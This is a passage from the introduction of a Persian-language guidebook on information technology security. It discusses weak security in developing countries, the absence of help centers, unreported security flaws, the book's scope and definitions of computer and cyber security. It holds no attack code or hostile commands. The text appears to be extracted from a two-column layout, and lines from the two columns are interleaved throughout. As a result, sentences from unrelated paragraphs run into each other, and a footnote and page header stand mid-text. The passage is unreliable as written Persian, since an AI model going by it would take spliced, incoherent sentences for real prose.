‫ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﺧﺴﺎﺭﺍﺕ ﻭﺍﺭﺩﻩ )ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﺍﻳﻦ ﺧﺴﺎﺭﺍﺕ ﻗﺎﺑﻞ ﺗﺮﻣﻴﻢ‬ ‫ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ ﺩﺍﺭﺍﻱ‬
‫ﺑﺎﺷﻨﺪ( ﺗﻤﺎﻳﻞ ﭼﻨﺪﺍﻧﻲ ﺑﻪ ﺭﻓﻊ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﻧﺪﺍﺭﻧﺪ‪.‬‬ ‫ﻣﺮﺍﻛﺰ ﻛﻤﻚﺭﺳﺎﻧﻲ‪ ١١‬ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺳﻂ ﻣﺘﺨﺼﺼﻴﻦ ﻓﻨـﻲ ﺍﺩﺍﺭﻩ‬
‫ﻣﻲﺷﻮﻧﺪ ﻭ ﻗﺎﺩﺭ ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺩ ﺳﻮﺀ ﻣﻨـﺎﺑﻊ ﺳـﺎﺯﻣﺎﻧﻲ ﻭ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﺎﻳﺪ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻌﻨـﻮﺍﻥ ﺍﻭﻟﻮﻳـﺖ‬
‫ﺗﺄﻣﻴﻦ ﺣﻔﺎﻇﺖ ﺁﻧﻬﺎ ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬
‫ﺍﺻﻠﻲ ﺧﻮﺩ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻧﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺧﻄـﺮ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺗﺒﻬﻜﺎﺭﺍﻧـﻪ‬
‫ﺑﻴﺸﺘﺮ ﻣﺘﻮﺟﻪ ﻣﻜﺎﻧﻬﺎﻳﻲ ﺍﺳﺖ ﻛـﻪ ﺍﺯ ﻛﻨﺘـﺮﻝ ﻛـﺎﻓﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ‬ ‫ﻻ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ﻣﻌﻤـﻮ ﹰ‬
‫ﻧﺒﻮﺩﻩ ﻭ ﻧﺎﺍﻣﻦ ﻫﺴﺘﻨﺪ‪ .‬ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﻛـﻪ‬ ‫ﻓﺎﻗﺪ ﺗﻮﺍﻧﺎﻳﻲ ﺍﺭﺍﺋﻪ ﺍﻳﻦ ﺳﻄﺢ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺗﻌﺪﺍﺩ ﻛﺎﺭﺑﺮﺍﻥ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺁﻧﻬـﺎ ﻛﻤﺘـﺮ ﺗـﺄﻣﻴﻦ ﺷـﺪﻩ ﺍﻫـﺪﺍﻑ‬ ‫ﺍﻧﺪﻙ ﺍﺳﺖ ﻭ ﺑﻪ ﻫﺸﺪﺍﺭﻫﺎ ﻭ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﻧﻴـﺰ ﺗﻮﺟـﻪ‬
‫ﺟﺬﺍﺏﺗﺮﻱ ﺑـﺮﺍﻱ ﺣﻤﻠـﻪ ﻫـﺴﺘﻨﺪ‪ .‬ﻛـﺪﺍﻡ ﺳـﺎﺯﻣﺎﻥ ﻛﻮﭼـﻚ ﻳـﺎ‬ ‫ﻧﻤﻲﺷﻮﺩ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻏﺎﻟﺒﹰﺎ ﺩﺍﺭﺍﻱ‬
‫ﻣﺘﻮﺳﻂ ﺍﺳﺖ ﻛﻪ ﻋﻠﻴﺮﻏﻢ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻦ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﺔ‬ ‫ﺑﺨﺶ ﺳﺘﺎﺩﻱ ﻛﻮﭼﻜﻲ ﻫﺴﺘﻨﺪ ﻭ ﻟﺬﺍ ﺗﻮﺍﻧﺎﻳﻲ ﻧﻈﺎﺭﺕ ﺑـﺮ ﻣﻨـﺎﺑﻊ‬
‫ﻣﺸﺘﺮﻳﺎﻥ‪ ،‬ﻓﺎﻳﻠﻬﺎﻱ ﺗﺠـﺎﺭﻱ ﻭ ﻳـﺎ ﺩﺳـﺘﻜﺎﺭﻱ ﺷـﺪﻥ ﺍﻃﻼﻋـﺎﺕ‬ ‫ﻓﻨﻲ ﺩﺍﺧﻠﻲ ﺧﻮﺩ ﺭﺍ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻭﻗﺎﺕ ﺍﻳﻦ ﻋﺪﻡ ﺗﻮﺟـﻪ ﻭ‬
‫ﻛﻠﻴﺪﻱ ﺳـﺎﺯﻣﺎﻥ ﻫﻤﭽﻨـﺎﻥ ﺑﺘﻮﺍﻧـﺪ ﭘﺎﺑﺮﺟـﺎ ﺑﻤﺎﻧـﺪ؟ ﻛـﺸﻮﺭﻫﺎﻱ‬ ‫ﻧﺎﺗﻮﺍﻧﻲ ﺑﻪ ﺩﻟﻴﻞ ﻋﺪﻡ ﻭﺟﻮﺩ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺩﺍﻧـﺶ ﻛـﺎﻓﻲ ﺩﺭﺑـﺎﺭﺓ‬
‫ﻲ ﺁﻣـﻮﺯﺵﺩﻳـﺪﻩ ﻭ‬ ‫ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ﺑﺎﻳـﺪ ﻇﺮﻓﻴـﺖ ﻣﻨـﺎﺑﻊ ﺍﻧـﺴﺎﻧ ﹺ‬ ‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺍﺳـﺖ‪ ،‬ﻭ ﮔﺮﻭﻫﻬـﺎﻳﻲ ﻛـﻪ‬
‫ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺧﻮﺩ ﺭﺍ ﺑﻬﺒﻮﺩ ﺑﺨﺸﻨﺪ ﺗـﺎ ﺍﻫـﺪﺍﻑ ﺁﺳـﺎﻧﻲ‬ ‫ﻻ ﺩﺭ ﻓﻬـﻢ ﭼﮕـﻮﻧﮕﻲ‬ ‫ﺍﺻﻮﻝ ﺍﺳﺎﺳﻲ ﺭﺍ ﺩﺭﻙ ﻛﺮﺩﻩﺍﻧﺪ ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺮﺍﻱ ﺣﻤﻠﺔ ﺗﺒﻬﻜﺎﺭﺍﻥ ﻓﻀﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﺒﺎﺷـﻨﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ‬ ‫ﺳﺎﺯﮔﺎﺭﺳﺎﺯﻱ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻓﻨـﻲ ﺑـﺎ ﺷـﺮﺍﻳﻂ ﻣﺘﻐﻴـﺮ ﻭ ﻏﻴﺮﻗﺎﺑـﻞ‬
‫ﺑﺤﺜﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺩﺭﺑﺎﺭﺓ ﻣﺎﻫﻴﺖ ﻣﻮﺿـﻮﻉ ﺍﻣﻨﻴـﺖ ﻣﻄـﺮﺡ ﺷـﺪﻩ‬ ‫ﻲ ﺍﻳﻦ ﻣﺤﻴﻂ ﻣﺸﻜﻞ ﺩﺍﺭﻧﺪ‪.‬‬ ‫ﭘﻴﺶﺑﻴﻨ ﹺ‬
‫ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺩﻳﺪﮔﺎﻩﻫﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ‬ ‫ﺧﺪﻣﺎﺕ ﭘﺲ ﺍﺯ ﻓـﺮﻭﺵ ﺩﺭ ﮔﺬﺷـﺘﻪ ﺑـﺼﻮﺭﺕ ﻧﺎﻣﺤـﺪﻭﺩ ﺑـﺮﺍﻱ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﺩﺍﺩﻩﻫﺎ ﻧﮕﺮﺍﻧﻲ ﺩﺍﺭﻧـﺪ ﺑـﻪ ﺍﻳـﻦ‬ ‫ﺭﺍﻳﺎﻧﻪ ﻫﺎﻳﻲ ﻛﻪ ﻛـﻢﺗﻌـﺪﺍﺩ ﻭ ﮔﺮﺍﻧﻘﻴﻤـﺖ ﺑﻮﺩﻧـﺪ ﺩﺭﻧﻈـﺮ ﮔﺮﻓﺘـﻪ‬
‫ﻣــﺴﺌﻠﻪ ﺑﻌﻨــﻮﺍﻥ ﻳــﻚ ﻣﻮﺿــﻮﻉ ﺩﺭ ﺣــﻮﺯﺓ ﺍﻣﻨﻴــﺖ ﺍﻃﻼﻋــﺎﺕ‬ ‫ﻣﻲﺷﺪ؛ ﺍﻣﺎ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺣﺠﻢ ﺍﻧﺒـﻮﻩ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺩﺭ‬
‫ﻲ ﺫﺧﻴـﺮﻩ ﻭ ﺍﺭﺳـﺎﻝ‬ ‫ﻣﻲﻧﮕﺮﻧﺪ؛ ﻛـﺴﺎﻧﻴﻜﻪ ﺑـﺎ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﻓﻨـ ﹺ‬
‫ﺑﺎﺯﺍﺭ ﻧﻤﻲﺗﻮﺍﻥ ﺑﺴﺎﺩﮔﻲ ﭼﻨﻴﻦ ﺧﺪﻣﺎﺗﻲ ﺭﺍ ﺍﺭﺍﺋﻪ ﻛﺮﺩ‪ .‬ﻓﺮﻭﺷﮕﺎﻫﻬﺎ‬
‫ﺍﻃﻼﻋﺎﺕ ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻧﺪ ﺍﻳﻦ ﻣﺒﺤﺚ ﺭﺍ ﺍﺯ ﺩﻳﺪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﻭ‬
‫ﻻ ﺍﺯ ﻣـﺸﻜﻼﺗﻲ ﻛـﻪ ﺩﺭ‬ ‫ﻭ ﻣﺮﺍﻛﺰ ﺧﺪﻣﺎﺕ ﺗﻌﻤﻴﺮﺍﺕ ﺭﺍﻳﺎﻧﻪ ﻣﻌﻤـﻮ ﹰ‬
‫ﺷﺒﻜﻪ ﻣﻲ ﺑﻴﻨﻨﺪ؛ ﺣﺎﻝ ﺁﻧﻜﻪ ﺩﻳﮕﺮﺍﻧﻲ ﻛـﻪ ﺑـﻪ ﺗﺠـﺎﺭﺕ ﻣـﺸﻐﻮﻝ‬
‫ﺳﺎﻳﺮ ﻧﻘﺎﻁ ﺩﻧﻴﺎ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ ﻣﻄﻠﻊ ﻧﻴﺴﺘﻨﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻛﺎﺭﺑﺮﺍﻥ‬
‫ﻫﺴﺘﻨﺪ ﺑﻪ ﺁﻥ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﺣـﻮﺯﺓ ﺟﺪﻳـﺪ ﺩﺭ ﺗﺠـﺎﺭﺕ ﻭ ﻋﻤﻮﻣـﹰﺎ‬
‫ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺑﻪ ﻗﺮﺑﺎﻧﻴـﺎﻥ ﺗﻮﺳـﻌﺔ ﺍﻃﻼﻋـﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺍﻣﻨﻴـﺖ‬
‫ﺗﺤﺖ ﻋﻨﻮﺍﻥ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﮕﺎﻩ ﻣﻲﻛﻨﻨﺪ‪.‬‬ ‫ﻓﻨﺎﻭﺭﻱ ﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﻣﺎ ﺗﺮﺟﻴﺢ ﺩﺍﺩﻩﺍﻳﻢ ﺗﻤﺎﻡ ﻣﺒـﺎﺣﺜﻲ ﻛـﻪ ﺩﺭ‬ ‫ﻧﻘﺺ ﺍﻣﻨﻴﺘﻲ ﺷﺒﻜﻪ ﺩﺭ ﻫﻤﺔ ﻛﺸﻮﺭﻫﺎ ﺍﺗﻔـﺎﻕ ﻣـﻲﺍﻓﺘـﺪ ﻭ ﺣﺘـﻲ‬
‫ﻣﻘﻮﻟﻪ "ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ" ﻣﻲﮔﻨﺠـﺪ ﺭﺍ ﺍﺭﺍﺋـﻪ ﻛﻨـﻴﻢ ﻭ ﺍﺯ‬ ‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻮﺟﺐ ﺗﺤﺖ ﻓﺸﺎﺭ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺩﻭﻟﺘﻬﺎ ﻧﻴﺰ ﺑﮕـﺮﺩﺩ‪.‬‬
‫ﺍﻳﻦ ﻃﺮﻳﻖ ﺑﻪ ﺗﻤﺎﻣﻲ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺫﺧﻴﺮﻩ ﻭ ﭘـﺮﺩﺍﺯﺵ ﻭ ﺍﺭﺳـﺎﻝ‬ ‫ﻻ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﻧﻘﺼﻬﺎ ﮔﺰﺍﺭﺵ ﻧﻤﻲﺷﻮﻧﺪ؛ ﭼﺮﺍﻛﻪ ﺍﻃﻼﻉ‬‫ﻣﻌﻤﻮ ﹰ‬
‫ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺳﺨﺖﺍﻓﺰﺍﺭ‪ ،‬ﻧﺮﻡﺍﻓﺰﺍﺭ‪ ،‬ﻭ ﺗﺴﻬﻴﻞ ﺍﺭﺗﺒﺎﻃـﺎﺕ‪ ،‬ﺑـﺎ ﻳـﻚ‬
‫ﻧﮕﺎﻩ ﻭﻳﮋﻩ ﺑﻪ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺍﻃﻼﻋﺎﺕ ﺑﭙﺮﺩﺍﺯﻳﻢ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ‬
‫‪11‬‬ ‫‪Help Centers‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٦‬‬

‫ﺧﻮﺍﻧﻨﺪﻩ ﺑﺎﻳﺪ ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻣﺆﻟﻔﻴﻦ ﺑﺮﺍﻱ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﻭ‬ ‫ﺣﺎﺋﺰ ﺍﻫﻤﻴـﺖ ﺍﺳـﺖ ﻛـﻪ ﻫـﻢ ﺍﻃﻼﻋـﺎﺕ ﻭ ﻫـﻢ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ‬
‫ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺍﺻﻄﻼﺣﺎﺕ ﻣﺨﺘﻠﻔﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩﻩﺍﻧـﺪ‪ .‬ﺑﻄـﻮﺭ ﻛﻠـﻲ‬ ‫ﭘﺮﺩﺍﺯﺵ ﺁﻥ ﺑﺎﻳﺪ ﺍﺯ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻣﺼﻮﻥ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﻣﻮﺿﻮﻋﺎﺕ ﺯﻳﺮ ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ‪:‬‬ ‫ﻣﺎ ﺗﻌﻤﺪﹰﺍ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﻮﺟﻪ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ‪ ،‬ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻭ‬
‫‪ (۱‬ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ‪ :‬ﺍﻣﻨﻴﺖ ﺍﺯ ﻧﻈﺮ ﻓﻨﻲ ﺩﺭ ﻣﺎﺷﻴﻨﻬﺎ‪ ،‬ﻧﺮﻡﺍﻓـﺰﺍﺭ‪،‬‬ ‫ﺷﺒﻜﻪﻫﺎ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻩﺍﻳﻢ؛ ﭼﺮﺍﻛﻪ ﻣﻨﺎﺑﻊ ﻏﻨﻲ ﻭ ﻣﺘﻌـﺪﺩﻱ ﺑـﺮﺍﻱ‬
‫ﺩﺍﺩﻩﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ‪ .‬ﺍﺯ ﺍﻳﻦ ﺍﺻـﻄﻼﺡ ﺑﻴـﺸﺘﺮ ﺩﺭ ﺑﺨـﺸﻬﺎﻱ‬ ‫ﺁﮔﺎﻫﻲ ﺍﺯ ﺟﺰﺋﻴﺎﺕ ﻣﺴﺎﺋﻞ ﺩﻳﮕﺮ ﻧﻈﻴﺮ ﺗﻠﻔﻦ ﺛﺎﺑﺖ ﻭ ﻫﻤﺮﺍﻩ ﻛﻪ ﺩﺭ‬
‫ﺩﻭﻡ ﻭ ﭘــﻨﺠﻢ ﺍﺳــﺘﻔﺎﺩﻩ ﺷــﺪﻩ ﻛــﻪ ﺑﻴــﺸﺘﺮ ﺑــﺮ ﺭﻭﻱ ﺍﺑﻌــﺎﺩ‬ ‫ﺍﺭﺗﺒﺎﻁ ﺗﻨﮕﺎﺗﻨﮓ ﺑﺎ ﺍﻳـﻦ ﻣـﺴﺎﺋﻞ ﻫـﺴﺘﻨﺪ ﻭ ﺩﺭ ﺍﻳﻨﺠـﺎ ﺑـﻪ ﺁﻧﻬـﺎ‬
‫ﻓﻴﺰﻳﻜﻲ‪ ،‬ﺯﻳﺮﺳﺎﺧﺘﻲ ﻭ ﻓﻨﻲ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺗﺄﻛﻴﺪ ﺩﺍﺭﻧﺪ‪.‬‬ ‫ﭘﺮﺩﺍﺧﺘﻪ ﻧﺸﺪﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﺎ ﻧﺰﺩﻳﻜﺘﺮ ﺷﺪﻥ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺗﻠﻔﻨـﻲ ﻭ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﻳﻜﺪﻳﮕﺮ‪ ،‬ﭼﻨﻴﻦ ﻣﺴﺎﺋﻠﻲ ﻧﻴﺰ ﺍﻫﻤﻴﺖ ﺑﻴـﺸﺘﺮﻱ ﭘﻴـﺪﺍ‬
‫‪ (۲‬ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ‪ :١٢‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭﺍﺑـﺴﺘﻪ ﺑـﻪ‬
‫ﻣــﻲﻛﻨﻨــﺪ‪ .‬ﺑــﺎ ﭘﻴــﺪﺍﻳﺶ‪ Voice over IP‬ﻭ ‪،ENUM‬‬
‫ﺳﻴﺎﺳﺖ ﺩﻭﻟﺘﻬﺎ‪ .‬ﺍﻳﻦ ﺍﺻـﻄﻼﺡ ﻋﻤﻮﻣـﹰﺎ ﺗﻮﺳـﻂ ﻣﺆﺳـﺴﺎﺕ‬
‫ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺗﻠﻔﻦ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻧﻴﺰ ﻛﺎﺭﺑﺮﺩ ﺭﻭﺯﺍﻓﺰﻭﻧﻲ ﻣﻲﻳﺎﺑﻨﺪ ﻭ ﺑـﺎ‬
‫ﺩﻭﻟﺘﻲ ﻭ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﻣﻠﻲ ﺩﺭ ﺍﺳﻨﺎﺩ‪ ،‬ﻗﻮﺍﻧﻴﻦ ﻭ ﭘﺮﻭﮊﻩﻫﺎﻱ‬
‫ﭘﻴﺪﺍﻳﺶ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ‪ 3G‬ﺑﺘﺪﺭﻳﺞ ﺑﻪ ﻣـﺴﺎﺋﻠﻲ ﭼـﻮﻥ ﺍﻣﻨﻴـﺖ ﺩﺭ‬
‫ﺗﺤﻘﻴﻘﺎﺗﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﺷﻮﺩ ﻭ ﻛﻤﺎﺑﻴﺶ ﻣﺘﺮﺍﺩﻑ ﺑﺎ "ﺍﻣﻨﻴـﺖ‬
‫ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﺗﻮﺟﻪ ﻛﺮﺩ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ" ﺍﺳﺖ )ﺍﺻﻄﻼﺣﻲ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺑـﻪ ﺁﻥ ﺍﺷـﺎﺭﻩ ﺍﻱ‬
‫ﻧﺸﺪﻩ‪ ،‬ﺍﻣﺎ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﺭ ﻣﺮﺍﺟﻊ ﺩﻳﮕﺮ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﺩ(‪ .‬ﻫـﺮ ﺩﻭ‬ ‫ﺍﻳﻦ ﻛﺘﺎﺏ ﺑـﻪ ﻧﺤـﻮﻱ ﺗـﺪﻭﻳﻦ ﺷـﺪﻩ ﻛـﻪ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﻋﺒﺎﺭﺕ ﺑﻪ ﺟﻮﺍﻧﺐ ﺍﻣﻨﻴﺖ ﺷـﺒﻜﻪ ﻭ ﺍﺻـﻮﻝ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﻱ‬ ‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﺑﺎ ﻫﺰﻳﻨﻪﺍﻱ ﺍﻧﺪﻙ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ‪ .‬ﻫﺪﻑ ﺍﺯ‬
‫ﺷﺒﻜﻪﻫﺎ ﻣﺜﻞ ﺗﻌﺮﻳـﻒ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ‪ ،‬ﺟـﺮﺍﺋﻢ ﺳـﺎﻳﺒﺮ‪،‬‬ ‫ﺍﻧﺘﺸﺎﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﻳﻦ ﻧﻴﺴﺖ ﻛﻪ ﺑﻪ ﺗﻴـﺮﺍﮊ ﺑـﺎﻻﻳﻲ ﺍﺯ ﺁﻥ ﺩﺳـﺖ‬
‫ﺗﺠﺎﺭﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺟﻬﺎﻧﻲ ﺍﺷﺎﺭﻩ ﺩﺍﺭﻧـﺪ‪ .‬ﺗﻔـﺎﻭﺕ ﺍﻳـﻦ ﺩﻭ‬ ‫ﻳﺎﺑﻴﻢ‪ ،‬ﺑﻠﻜﻪ ﺑﻨﺎ ﺑﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻔﺎﺩ ﻛﺘﺎﺏ ﺩﺭ ﻳﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ‬
‫ﺍﺻــﻄﻼﺡ ﭼﻨــﺪﺍﻥ ﺯﻳــﺎﺩ ﻧﻴــﺴﺖ؛ ﺑﻠﻜــﻪ ﻫﻤــﺎﻧﻄﻮﺭ ﻛــﻪ ﺩﺭ‬ ‫ﺟﻬﺎﻧﻲ ﺍﺭﺍﺋﻪ ﮔﺮﺩﺩ ﻛﻪ ﺍﺯ ﺩﻭ ﻟﺤﺎﻅ ﭘﻮﻳﺎ ﺑﺎﺷﺪ‪ :‬ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﻣﻄﺎﻟﺐ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺼﻠﻬﺎﻱ ﺍﻳﻦ ﻛﺘـﺎﺏ ﻣـﻲ ﺗـﻮﺍﻥ ﺩﻳـﺪ‪ ،‬ﺍﻣﻨﻴـﺖ‬ ‫ﺁﻥ ﺗﺎ ﺣﺪ ﺍﻣﻜﺎﻥ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﺷﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﻭ ﺩﻭﻡ ﺍﻳﻨﻜﻪ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺭﺍﻳﺎﻧﻪ ﻫﺎ‪ ،‬ﺷﺒﻜﻪ ﻫﺎ ﻭ ﺩﺍﺩﻩﻫـﺎ ﺗـﺎ ﺣـﺪ ﺯﻳـﺎﺩﻱ ﺑـﺎ ﻣﻔـﺎﻫﻴﻢ‬ ‫ﻣﻔﻴﺪ ﻭ ﻣﻨﺎﺳﺒﻲ ﺑﻪ ﺧﻮﺍﻧﻨﺪﮔﺎﻧﻲ ﻛـﻪ ﺑـﺪﻧﺒﺎﻝ ﻛـﺴﺐ ﺍﻃﻼﻋـﺎﺗﻲ‬
‫ﺭﻭﺯﻣﺮﺓ ﺍﻣﻨﻴﺖ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﻪ ﻫﻢ ﮔﺮﻩ ﺧﻮﺭﺩﻩﺍﻧﺪ‪.‬‬ ‫ﺩﺭﺑﺎﺭﺓ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻨﺪ ﺍﺭﺍﺋﻪ ﻛﻨﺪ‪.‬‬

‫ﺩﺭ ﺩﻧﻴـﺎﻱ ﺳﺮﻳﻊ ﻭ ﺩﺭﺣـﺎﻝ ﭘﻴـﺸـﺮﻓﺖ ﺍﻣـﺮﻭﺯ‪ ،‬ﺗـﺪﻭﻳﻦ ﮐﺘـﺎﺏ‬ ‫ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﻪ ﭘـﻨﺞ ﺑﺨـﺶ ﻣﺨﺘﻠـﻒ ﺗﻘـﺴﻴﻢ ﺷـﺪﻩ ﻛـﻪ‬
‫ﺭﺍﻫﻨﻤﺎ ﺩﺭ ﻣﻌﺮﺽ ﺍﻳﻦ ﺧﻄﺮ ﺍﺳﺖ ﻛﻪ ﺍﻧﺪﻛﻲ ﭘـﺲ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ ﺍﺯ‬ ‫ﻫﺮﻳﻚ ﻣﻨﺎﺳﺐ ﮔﺮﻭﻩ ﺧﺎﺻﻲ ﺍﺯ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻫﺴﺘﻨﺪ‪ .‬ﻻﺯﻡ ﺑﻪ ﺫﻛﺮ‬
